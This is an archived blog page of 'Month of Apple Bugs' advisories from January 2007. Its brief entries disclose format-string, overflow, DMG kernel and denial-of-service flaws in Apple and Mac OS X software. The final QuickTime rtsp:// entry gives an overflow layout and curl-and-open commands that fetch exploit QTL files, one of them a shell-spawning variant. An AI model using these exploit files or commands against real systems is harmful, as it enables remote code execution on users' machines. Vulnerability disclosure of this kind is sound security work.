Showing posts with label remote. Show all posts
Showing posts with label remote. Show all posts

Tuesday, January 30, 2007

MOAB-30-01-2007: Multiple Apple Software Format String Vulnerabilities

Multiple developers of Apple based software including Apples own developers seem to have a misunderstanding of how to properly use NSBeginAlertSheet, NSBeginCriticalAlertSheet, NSBeginInformationalAlertSheet, NSGetAlertPanel, NSGetCriticalAlertPanel, NSGetInformationalAlertPanel, NSReleaseAlertPanel, NSRunAlertPanel, NSRunCriticalAlertPanel, NSRunInformationalAlertPanel, and NSLog.

Further information:

Monday, January 29, 2007

MOAB-29-01-2007: Apple iChat Bonjour Multiple Denial of Service Vulnerabilities


Apple iChat Bonjour functionality is affected by several remotely exploitable denial of service flaws which can be triggered via advertising presence services over multicast DNS.

Further information:

Saturday, January 27, 2007

MOAB-27-01-2007: Telestream Flip4Mac WMV Parsing Memory Corruption Vulnerability

Flip4Mac fails to properly handle WMV files with a crafted ASF_File_Properties_Object size field, leading to an exploitable memory corruption condition, which can be abused remotely for arbitrary code execution.

Further information:
This can be abused remotely even via Mail.app (sending the movie attached in the message), Safari, etc.

Thursday, January 25, 2007

MOAB-25-01-2007: Apple CFNetwork HTTP Response Denial of Service

CFNetwork fails to handle certain HTTP responses properly, causing the _CFNetConnectionWillEnqueueRequests() function to dereference a NULL pointer, leading to a denial of service condition.

Further information:
Many thanks to Craig Loomis, Greg Slepak and a previous supporter for donating to the project. The mark is at $472.93 USD now, so we are very close to the goal. Again, many thanks to everyone who has contributed, with both donations and feedback.

Tuesday, January 23, 2007

MOAB-23-01-2007: Apple QuickDraw GetSrcBits32ARGB() Memory Corruption Vulnerability


QuickDraw is integrated in Mac OS X since very early versions, used by Quicktime and any other application that needs to handle PICT images. A vulnerability exists in the handling of ARGB records (Alpha RGB) within PICT images, that leads to an exploitable memory corruption condition (ex. denial of service, so-called crash, which can be used to gain root privileges in combination with MOAB-22-01-2007).

For further information:
Apple has released a fix to MOAB-01-01-2007: Security Update 2007-001. They finally acknowledge the MoAB, with some PR crediting wizardry, aka 'let's mention but not explicitly say we are broken'. 22 days to fix a remote arbitrary code execution issue in one of their most extended products, distributed with working exploits for both Microsoft Windows and Mac OS X versions can be considered acceptable timing. Come on, it's not that difficult to change a strcpy() call... is it?

Saturday, January 20, 2007

MOAB-20-01-2007: Apple iChat aim:// URL Handler Format String Vulnerability

Apple iChat AIM URI scheme handling is affected by a classic format string vulnerability, allowing remote users to cause a denial of service condition or arbitrary code execution.
Further information:

Friday, January 19, 2007

MOAB-19-01-2007: Transmit.app ftps:// URL Handler Heap Buffer Overflow

Transmit does not allocate enough space when dealing with the string passed on via the ftps:// URL handler, leading to an exploitable heap-based buffer overflow condition.

For further information:
We are releasing miscellaneous issues in order to have a slot full of interesting releases for this next week, that need to be properly worked on. To all of those asking 'Is that an Apple bug?' , please refer to the FAQ:
  1. Are Apple products the only one target of this initiative?
  2. Not at all, but they are the main focus. We'll be looking over popular OS X applications as well.

Thursday, January 18, 2007

MOAB-18-01-2007: Rumpus Multiple Vulnerabilities

rumpusd is vulnerable to different remotely exploitable heap-based buffer overflows, denial of service conditions and local privilege escalation issues. Due to the fact that Rumpus works under root privileges, successful exploitation by unprivileged users would allow a full compromise of the system.

Most of these issues are related to both FTP and HTTP request parsing, as well as insecure use of the system() function and incorrect permissions and/or handling of setuid binaries.
Further information:

Wednesday, January 17, 2007

MOAB-17-01-2007: Apple SLP Daemon Service Registration Buffer Overflow Vulnerability

slpd is vulnerable to a buffer overflow condition when processing the attr-list field of a registration request, leading to an exploitable denial of service condition and potential arbitrary execution. It would allow unprivileged local (and possibly remote) users to execute arbitrary code under root privileges.

For further information:
This issue was reported to Apple on 8/2/06 5:31 PM.

Tuesday, January 16, 2007

MOAB-16-01-2007: Multiple Colloquy IRC Format String Vulnerabilities

Colloquy is vulnerable to a format string vulnerability in the handling of INVITE requests, that can be abused by remote users and requires no interaction at all, leading to a denial of service and potential arbitrary code execution.

Further information:

Friday, January 12, 2007

MOAB-12-01-2007: Apple DMG UFS ufs_lookup() Denial of Service Vulnerability

A specially crafted UFS filesystem in a DMG image can cause the ufs_lookup() function to call ufs_dirbad() when a corrupted directory entry is being read, leading to a kernel panic (denial of service).
For further information:

We would like to thank evan1138 for his generous donation to the project, as well as his constructive feedback and comments.

Thursday, January 11, 2007

MOAB-11-01-2007: Apple DMG UFS byte_swap_sbin() Integer Overflow Vulnerability

The byte_swap_sbin() function, one of the UFS byte swapping routines (this code isn't present in FreeBSD and it's Mac OS X XNU-specific; used for compatibility of filesystem streams between little and big-endian systems) is affected by a integer overflow vulnerability, leading to an exploitable denial of service condition.

For further information:
You may have noticed some changes. As KF would say, "we are more respectable now". The issues will still feature hilarious artwork by talented fellow GC. Enjoy.

Wednesday, January 10, 2007

MOAB-10-01-2007: Apple DMG UFS ffs_mountfs() Integer Overflow Vulnerability

The ffs_mountfs() function, part of the UFS filesystem handling code (shared between FreeBSD and Mac OS X XNU) is affected by an integer overflow vulnerability, leading to an exploitable denial of service condition and potential arbitrary code execution.

For further information:
Note: Apple requested confirmation more than one month ago, when the original FreeBSD UFS vulnerabilities got published in the MoKB. This serves as confirmation that the issues obviously exist in both XNU and FreeBSD. It wasn't that difficult to verify, given that the UFS code is exactly the same in both.

We'll be releasing kernel-related issues for some time (mixed with remote user-land issues, just to keep it fun). Mostly DMG related flaws that didn't make it to the MoKB schedule.

Tuesday, January 9, 2007

MOAB-09-01-2007: Apple Finder DMG Volume Name Memory Corruption

Finder is affected by a memory corruption vulnerability, which leads to an exploitable denial of service condition and potential arbitrary code execution, that can be triggered by DMG images.


For further information:

Sunday, January 7, 2007

MOAB-07-01-2007: OmniWeb Javascript alert() Format String Vulnerability

OmniWeb is affected by a format string vulnerability in the handling of Javascript alert() function, which could allow remote arbitrary code execution.
Some hate e-mail examples available from the Rixstep fellows at The ORLANDO Files.

Update: After contacting Omni Group they have provided a new OmniWeb version, 5.5.2, which fixes this issue. Prompt response and fix times. Way to go! (missed to credit KF, though)

Saturday, January 6, 2007

MOAB-06-01-2007: Multiple Vendor PDF Document Catalog Handling Vulnerability

The current PDF specification is affected by a design flaw: a rogue Pages entry or malicious catalog dictionary could cause a denial of service (memory corruption condition, memory leakage, etc) or potential arbitrary code execution in the reader application.
Further information:
One of those nice issues you "can't" find with so-called fuzzing, but instead reading the format specification...

Thursday, January 4, 2007

MOAB-04-01-2007: iLife iPhoto Photocast XML title Format String Vulnerability

A format string vulnerability in the handling of iPhoto XML feeds title field allows potential remote arbitrary code execution.

For further information:

Wednesday, January 3, 2007

MOAB-03-01-2007: Apple Quicktime HREFTrack Cross-Zone Scripting vulnerability

A month ago, a vulnerability in QuickTime was exploited to spread a worm in MySpace. The vulnerability was first published by pdp. In his article, pdp describes how HREFTrack attribute in .mov files can be used for malicious scripting. The MySpace worm abused this vulnerability in a cross-site scripting attack vector.

This MoAB issue shows that this vulnerability can also be used in a cross-zone scripting attack which could allow, in combination with other vulnerabilities, to remotely execute arbitrary code on the user's machine, as well as disclosure of the filesystem contents.Thanks to Aviv Raff for contributing this nice issue. Thanks to pdp for working around Quicktime scripting issues too.
For further information:

Tuesday, January 2, 2007

MOAB-02-01-2007: VLC Media Player udp:// Format String Vulnerability

A format string vulnerability exists in the handling of the udp:// URL handler. By supplying a specially crafted string, a remote attacker could cause an arbitrary code execution condition, under the privileges of the user running VLC.
Enjoy.

Monday, January 1, 2007

MOAB-01-01-2007: Apple Quicktime rtsp URL Handler Stack-based Buffer Overflow

A vulnerability exists in the handling of the rtsp:// URL handler. By supplying a specially crafted string (rtsp:// [random] + colon + [299 bytes padding + payload]), an attacker could overflow a stack-based buffer, using either HTML, Javascript or a QTL file as attack vector, leading to an exploitable remote arbitrary code execution condition.
For further information:
Happy New Year!

Update: An example QTL file exploiting this issue (pwnage.qtl) is available (it will say 'happy new year' via /usr/bin/say, and expects the command string to be located at 0x17a053c, tested on Mac OS X 10.4.8 8L2127, x86 architecture). If it doesn't work on your system, use the exploit to generate another QTL with your own options or the shell spawn variant (pwnage-shell.qtl, 100% reliable for a current up-to-date x86-based OS X system). Usage:

$ curl http://projects.info-pull.com/moab/bug-files/pwnage.qtl -o pwnage.qtl
(...)
$ open pwnage.qtl
$ curl http://projects.info-pull.com/moab/bug-files/pwnage-shell.qtl -o pwnage-shell.qtl
(...)
$ open pwnage-shell.qtl